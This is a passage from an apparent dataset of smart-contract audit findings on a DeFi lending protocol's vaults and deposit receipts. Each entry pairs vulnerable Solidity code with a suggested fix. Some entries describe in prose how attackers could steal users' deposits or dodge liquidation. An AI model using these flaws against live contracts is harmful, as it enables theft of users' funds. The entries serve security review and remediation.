directly:\\n```\\n uint256 amountOut; //amount received by trade\\n- bool stablePool; //if the traded pool is stable or volatile.\\n\\n- (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n- require(stablePool == stable, ""pricing occuring through wrong pool"" );\\n+ address pair;\\n\\n+ pair = router.pairFor(token1, USDC, stable)\\n+ amountOut = IPair(pair).getAmountOut(HUNDRED_TOKENS, token1)\\n```\\n",Malicious user can avoid liquidation,"```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, ""pricing occuring through wrong pool"" );\\n```\\n" +Users are unable close or add to their Lyra vault positions when price is stale or circuit breaker is tripped,high,"Users are unable close or add to their Lyra vault positions when price is stale or circuit breaker is tripped. This is problematic for a few reasons. First is that the circuit breaker can be tripped indefinitely which means their collateral could be frozen forever and they will be accumulating interest the entire time they are frozen. The second is that since they can't add any additional collateral to their loan, the loan may end up being underwater by the time the price is no longer stale or circuit breaker is no longer tripped. They may have wanted to add more assets and now they are liquidated, which is unfair as users who are liquidated are effectively forced to pay a fee to the liquidator.\\n```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), ""Global Cache Stale, can't trade"");\\n require(circuitBreakerExpiry < block.timestamp, ""Lyra Circuit Breakers active, can't trade"");\\n}\\n```\\n\\nThe above lines are run every time a user a user tries to interact with the vault. Currently this is overly restrictive and can lead to a lot of undesired situations, as explained in the summary.","The contract is frozen when price is stale or circuit breaker is tripped to prevent price manipulation. While it should restrict a majority of actions there are a two that don't need any price validation. If a user wishes to close out their entire loan then there is no need for price validation because the user has no more debt and therefore doesn't need to maintain any level of collateralization. The other situation is if a user adds collateral to their vault and doesn't take out any more loans. In this scenario, the collateralization can only increase, which means that price validation is not necessary.\\nI recommend the following changes to closeLoan:\\n```\\n- _checkIfCollateralIsActive(currencyKey);\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, ""Trying to return more isoUSD than borrowed!"");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n+ //only need to check collateral value if user has remaining debt\\n+ _checkIfCollateralIsActive(currencyKey);\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n\\nI recommend removing liquidation threshold check from increaseCollateralAmount:\\n```\\n //debatable check begins here \\n- uint256 totalCollat = collateralPosted[_collateralAddress][msg.sender] + _colAmount;\\n- uint256 colInUSD = priceCollateralToUSD(currencyKey, totalCollat);\\n- uint256 USDborrowed = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n- uint256 borrowMargin = (USDborrowed * liquidatableMargin) / LOAN_SCALE;\\n- require(colInUSD >= borrowMargin, ""Liquidation margin not met!"");\\n //debatable check ends here\\n```\\n","Frozen assets, unfair interest accumulation and unfair liquidations","```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), ""Global Cache Stale, can't trade"");\\n require(circuitBreakerExpiry < block.timestamp, ""Lyra Circuit Breakers active, can't trade"");\\n}\\n```\\n" +Anyone can withdraw user's Velo Deposit NFT after approval is given to depositor,high,"`Depositor#withdrawFromGauge` is a public function that can be called by anyone which transfers token to `msg.sender`. `withdrawFromGauge` burns the NFT to be withdrawn, which means that `Depositor` must either be approved or be in possession of the NFT. Since it doesn't transfer the NFT to the contract before burning the user must either send the NFT to the `Depositor` or `approve` the `Depositor` in a separate transaction. After the NFT is either transferred or approved, a malicious user could withdraw the NFT for themselves.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\n`Depositor#withdrawFromGauge` allows anyone to call it, burning the NFT and sending `msg.sender` the withdrawn tokens.\\n```\\nfunction burn(uint256 _NFTId) external onlyMinter{\\n require(_isApprovedOrOwner(msg.sender, _NFTId), ""ERC721: caller is not token owner or approved"");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n}\\n```\\n\\n`Depositor` calls `DepositReceipt_Base#burn`, which means that it must be either the owner or approved for the NFT. Since `Depositor#withdrawFromGauge` doesn't transfer the NFT from the user, this must happen in a separate transaction. Between the user approval/transfer and them calling `Depositor#withdrawFromGauge` a malicious user could call `Depositor#withdrawFromGauge` first to withdraw the NFT and steal the users funds. This would be very easy to automate with a bot.\\nExample: `User A` deposits 100 underlying into their `Depositor` and is given `Token A` which represents their deposit. After some time they want to redeem `Token A` so they `Approve` their `Depositor` for `Token A`. `User B` sees the approval and quickly calls `Depositor#withdrawFromGauge` to withdraw `Token A`. `User B` is sent the 100 tokens and `Token A` is burned from `User A`.","Only allow owner of NFT to withdraw it:\\n```\\n function withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n+ require(depositReceipt.ownerOf(_NFTId) == msg.sender);\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n }\\n```\\n",Users attempting to withdraw can have their funds stolen,"```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n" +Swapping 100 tokens in DepositReceipt_ETH and DepositReciept_USDC breaks usage of WBTC LP and other high value tokens,high,"DepositReceipt_ETH and DepositReciept_USDC checks the value of liquidity by swapping 100 tokens through the swap router. WBTC is a good example of a token that will likely never work as LP due to the massive value of swapping 100 WBTC. This makes DepositReceipt_ETH and DepositReciept_USDC revert during slippage checks after calculating amount out. As of the time of writing this, WETH also experiences a 11% slippage when trading 100 tokens. Since DepositReceipt_ETH only supports 18 decimal tokens, WETH/USDC would have to use DepositReciept_USDC, resulting in WETH/USDC being incompatible. The fluctuating liquidity could also make this a big issue as well. If liquidity reduces after deposits are made, user deposits could be permanently trapped.\\n```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n\\nThe above lines try to swap 100 tokens from token1 to USDC. In the case of WBTC 100 tokens is a monstrous amount to swap. Given the low liquidity on the network, it simply won't function due to slippage requirements.\\n```\\nfunction _priceCollateral(IDepositReceipt depositReceipt, uint256 _NFTId) internal view returns(uint256){ \\n uint256 pooledTokens = depositReceipt.pooledTokens(_NFTId); \\n return( depositReceipt.priceLiquidity(pooledTokens));\\n}\\n\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\nOne of the two functions above are used to price LP for every vault action on Vault_Velo. If liquidity is sufficient when user deposits but then drys up after, the users deposit would be permanently trapped in the in the vault. In addition to this liquidation would also become impossible causing the protocol to assume bad debt.\\nThis could also be exploited by a malicious user. First they deposit a large amount of collateral into the Velodrome WBTC/USDC pair. They take a portion of their LP and take a loan against it. Now they withdraw the rest of their LP. Since there is no longer enough liquidity to swap 100 tokens with 5% slippage, they are now safe from liquidation, allowing a risk free loan.","Change the number of tokens to an immutable, so that it can be set individually for each token. Optionally you can add checks (shown below) to make sure that the number of tokens being swapped will result in at least some minimum value of USDC is received. Similar changes should be made for DepositReceipt_ETH:\\n```\\nconstructor(string memory _name, \\n string memory _symbol, \\n address _router, \\n address _token0,\\n address _token1,\\n uint256 _tokensToSwap,\\n bool _stable,\\n address _priceFeed) \\n ERC721(_name, _symbol){\\n\\n // rest of code\\n\\n if (keccak256(token0Symbol) == keccak256(USDCSymbol)){\\n require( IERC20Metadata(_token1).decimals() == 18, ""Token does not have 18dp"");\\n\\n+ (amountOut,) = _router.getAmountOut(_tokensToSwap, token1, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n else\\n { \\n bytes memory token1Symbol = abi.encodePacked(IERC20Metadata(_token1).symbol());\\n require( keccak256(token1Symbol) == keccak256(USDCSymbol), ""One token must be USDC"");\\n require( IERC20Metadata(_token0).decimals() == 18, ""Token does not have 18dp"");\\n \\n+ (amountOut, ) = _router.getAmountOut(_tokensToSwap, token0, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n```\\n",LPs that contain high value tokens will be unusable at best and freeze user funds or be abused at the worst case,"```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n" +Lyra vault underestimates the collateral value,medium,"Lyra vault subtracts the withdrawal fee while calculating the collateral value in USD, and it does not match the actual Lyra Pool implementation.\\nThe user's collateral value is estimated using the function `priceCollateralToUSD()` at `Vault_Lyra.sol#L77` as follows.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nSo it is understood that the withdrawal fee is removed to get the reasonable value of the collateral. But according to the Lyra Pool implementation, the token price used for withdrawal is calculated using the function `_getTotalBurnableTokens`. And the function `_getTotalBurnableTokens` is as belows.\\n```\\nfunction _getTotalBurnableTokens()\\n internal\\n returns (\\n uint tokensBurnable,\\n uint tokenPriceWithFee,\\n bool stale\\n )\\n {\\n uint burnableLiquidity;\\n uint tokenPrice;\\n (tokenPrice, stale, burnableLiquidity) = _getTokenPriceAndStale();\\n\\n if (optionMarket.getNumLiveBoards() != 0) {\\n tokenPriceWithFee = tokenPrice.multiplyDecimal(DecimalMath.UNIT - lpParams.withdrawalFee);\\n } else {\\n tokenPriceWithFee = tokenPrice;//@audit withdrawalFee is not applied if there are no live borads\\n }\\n\\n return (burnableLiquidity.divideDecimal(tokenPriceWithFee), tokenPriceWithFee, stale);\\n }\\n```\\n\\nFrom the code, it is clear that the withdrawal fee is subtracted only when the related option market has live boards. Because `Vault_Lyra.sol` applies a withdrawal fee all the time to price the collateral, it means the user's collateral is under-valued.",Make sure to apply withdrawal fee consistent to how Lyra pool does.,User's collaterals are under-valued than reasonable and might get to a liquidatable status sooner than expected. A liquidator can abuse this to get an unfair profit by liquidating the user's collateral with the under-estimated value and withdrawing it from the Lyra pool without paying a withdrawal fee.,"```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n" +Bad debt may persist even after complete liquidation in Velo Vault due to truncation,medium,"When liquidating a user, if all their collateral is taken but it is not valuable enough to repay the entire loan they would be left with remaining debt. This is what is known as bad debt because there is no collateral left to take and the user has no obligation to pay it back. When this occurs, the vault will forgive the user's debts, clearing the bad debt. The problem is that the valuations are calculated in two different ways which can lead to truncation issue that completely liquidates a user but doesn't clear their bad debt.\\n```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , ""Loan not liquidatable"");\\n proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, ""excessive liquidation suggested"");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n\\nThe primary check before clearing bad debt is to check if `proposedLiquidationAmount >= totalUserCollateral`. The purpose of this check is to confirm that all of the user's collateral is being liquidated. The issue is that each value is calculated differently.\\n```\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\n`totalCollateralValue` it used to calculate `totalUserCollateral`. In this method the pooled tokens are summed across all NFT's then they are priced. This means that the value of the liquidity is truncated exactly once.\\n```\\nfunction _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256){\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, ""partialPercentage greater than 100%"");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n proposedLiquidationAmount += \\n (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n *_partialPercentage)/ LOAN_SCALE);\\n } \\n else {\\n proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n return proposedLiquidationAmount;\\n}\\n```\\n\\n`_calculateProposedReturnedCapital` is used to calculate `proposedLiquidationAmount`. The key difference is that each NFT is priced individually. The result is that the value is truncated up to NFT_LIMIT times. This can lead to `proposedLiquidationAmount` being less than totalUserCollateral even if all user collateral is being liquidated.\\nExample: User A has 2 NFTs. They are valued as follows assuming no truncation: 10.6 and 10.7. When calculating via `totalCollateralValue` they will be summed before they are truncated while in `_calculateProposedReturnedCapital` they will be truncated before they are summed.\\ntotalCollateralValue: 10.6 + 10.7 = 21.3 => 21 (truncated)\\n_calculateProposedReturnedCapital: 10.6 => 10 (truncated) 10.7 => 10 (truncated)\\n10 + 10 = 20\\nAs shown above when using the exact same inputs into our two different functions the final answer is different. In a scenario like this, even though all collateral is taken from the user, their bad debt won't be cleared.","`_calculateProposedReturnedCapital` should be changed to be similar to `totalCollateralValue`, summing all pooled tokens before pricing:\\n```\\n function _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256) {\\n+ IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n+ uint256 totalPooledTokens\\n- uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, ""partialPercentage greater than 100%"");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n+ totalPooledTokens += ((depositReceipt.pooledTokens(userNFTs.ids[i]) * _partialPercentage) / LOAN_SCALE);\\n- proposedLiquidationAmount += \\n- (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n- *_partialPercentage)/ LOAN_SCALE);\\n } \\n else{\\n+ totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n- proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n+ return(depositReceipt.priceLiquidity(totalPooledTokens));\\n- return proposedLiquidationAmount;\\n }\\n```\\n",Bad debt will not be cleared in some liquidation scenarios,"```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , ""Loan not liquidatable"");\\n proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, ""excessive liquidation suggested"");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n" +priceLiquidity() may not work if PriceFeed.aggregator() is updated,medium,"priceLiquidity() may not work if PriceFeed.aggregator() is updated\\nIn the constructor of the DepositReceipt_* contract, the value of minAnswer/maxAnswer in priceFeed.aggregator() is obtained and assigned to *MinPrice/*MaxPrice as the maximum/minimum price limit when calling the getOraclePrice function in priceLiquidity, and *MinPrice/*MaxPrice can not change.\\n```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n```\\n\\nBut in the priceFeed contract, the address of the aggregator can be changed by the owner, which may cause the value of minAnswer/maxAnswer to change, and the price limit in the DepositReceipt_* contract to be invalid, and priceLiquidity() can not work.\\n```\\n function confirmAggregator(address _aggregator)\\n external\\n onlyOwner()\\n {\\n require(_aggregator == address(proposedAggregator), ""Invalid proposed aggregator"");\\n delete proposedAggregator;\\n setAggregator(_aggregator);\\n }\\n\\n\\n /*\\n * Internal\\n */\\n\\n function setAggregator(address _aggregator)\\n internal\\n {\\n uint16 id = currentPhase.id + 1;\\n currentPhase = Phase(id, AggregatorV2V3Interface(_aggregator));\\n phaseAggregators[id] = AggregatorV2V3Interface(_aggregator);\\n }\\n // rest of code\\n function aggregator()\\n external\\n view\\n returns (address)\\n {\\n return address(currentPhase.aggregator);\\n }\\n```\\n",Consider getting latest priceFeed.aggregator().minAnswer()/maxAnswer() in priceLiquidity(),,"```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n```\\n" +Vault_Synths.sol code does not consider protocol exchange fee when evaluating the Collateral worth,medium,"Vault_Synths.sol code does not consider protocol fee.\\nIf we look into the good-written documentation:\\nI want to quote:\\nBecause the withdrawalFee of a lyra LP pool can vary we must fetch it each time it is needed to ensure we use an accurate value. LP tokens are devalued by this as a safety measure as any liquidation would include selling the collateral and so should factor in that cost to ensure it is profitable.\\nIn Vault_Lyra.sol, when calculating the collateral of the LP token, the fee is taken into consideration.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nThis is not the case for Vault_Synths.sol, the underlying token also charge exchange fee, but this fee is not reflected when evaluating the Collateral worth.\\nExchange fees are generated whenever a user exchanges one synthetic asset (Synth) for another through Synthetix.Exchange. Fees are typically between 10-100 bps (0.1%-1%), though usually 30 bps, and when generated are sent to the fee pool, where it is available to be claimed proportionally by SNX stakers each week.\\nwe can see that the sETH token charges 0.25%, the sBTC token charges 0.25%, the sUSD charges 0% fee, but this does not ensure this fee rate will not change in the future.","We recommend the project consider protocol exchange fee when evaluating the Collateral worth in Vault_Synths.sol\\nPrecisely when the exchange fee is updated, the fee is reflected in the collateral worth.\\n```\\n function setExchangeFeeRateForSynths(bytes32[] calldata synthKeys, uint256[] calldata exchangeFeeRates)\\n external\\n onlyOwner\\n {\\n flexibleStorage().setExchangeFeeRateForSynths(SETTING_EXCHANGE_FEE_RATE, synthKeys, exchangeFeeRates);\\n for (uint i = 0; i < synthKeys.length; i++) {\\n emit ExchangeFeeUpdated(synthKeys[i], exchangeFeeRates[i]);\\n }\\n }\\n\\n /// @notice Set exchange dynamic fee threshold constant in decimal ratio\\n /// @param threshold The exchange dynamic fee threshold\\n /// @return uint threshold constant\\n function setExchangeDynamicFeeThreshold(uint threshold) external onlyOwner {\\n require(threshold != 0, ""Threshold cannot be 0"");\\n\\n flexibleStorage().setUIntValue(SETTING_CONTRACT_NAME, SETTING_EXCHANGE_DYNAMIC_FEE_THRESHOLD, threshold);\\n\\n emit ExchangeDynamicFeeThresholdUpdated(threshold);\\n }\\n```\\n",The collateral may be overvalued because the exchange does not count when evaluating the Collateral worth and result in bad debt which makes the project insolvent.,"```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n" +User is unable to partially payback loan if they aren't able to post enough isoUSD to bring them back to minOpeningMargin,high,"The only way for a user to reduce their debt is to call closeLoan. If the amount repaid does not bring the user back above minOpeningMargin then the transaction will revert. This is problematic for users that wish to repay their debt but don't have enough to get back to minOpeningMargin as it could lead to unfair liquidations.\\n```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n\\nThe checks above are done when a user calls closeLoan. This ensures that the user's margin is back above minOpeningMargin before allowing them to remove any collateral. This is done as a safeguard to block loans users from effectively opening loans at lower than desired margin. This has the unintended consequence that as user cannot pay off any of their loan if they do not increase their loan back above minOpeningMargin. This could prevent users from being able to save a loan that is close to liquidation causing them to get liquidated when they otherwise would have paid off their loan.","I recommend adding a separate function that allows users to pay off their loan without removing any collateral:\\n```\\nfunction paybackLoan(\\n address _collateralAddress,\\n uint256 _USDToVault\\n ) external override whenNotPaused \\n {\\n _collateralExists(_collateralAddress);\\n _closeLoanChecks(_collateralAddress, 0, _USDToVault);\\n //make sure virtual price is related to current time before fetching collateral details\\n //slither-disable-next-line reentrancy-vulnerabilities-1\\n _updateVirtualPrice(block.timestamp, _collateralAddress);\\n ( \\n bytes32 currencyKey,\\n uint256 minOpeningMargin,\\n ,\\n ,\\n ,\\n uint256 virtualPrice,\\n \\n ) = _getCollateral(_collateralAddress);\\n //check for frozen or paused collateral\\n _checkIfCollateralIsActive(currencyKey);\\n\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, ""Trying to return more isoUSD than borrowed!"");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n\\n uint256 collateral = collateralPosted[_collateralAddress][msg.sender];\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateral); \\n uint256 borrowMargin = (outstandingisoUSD * liquidatableMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Liquidation margin not met!"");\\n \\n //record paying off loan principle before interest\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 interestPaid;\\n uint256 loanPrinciple = 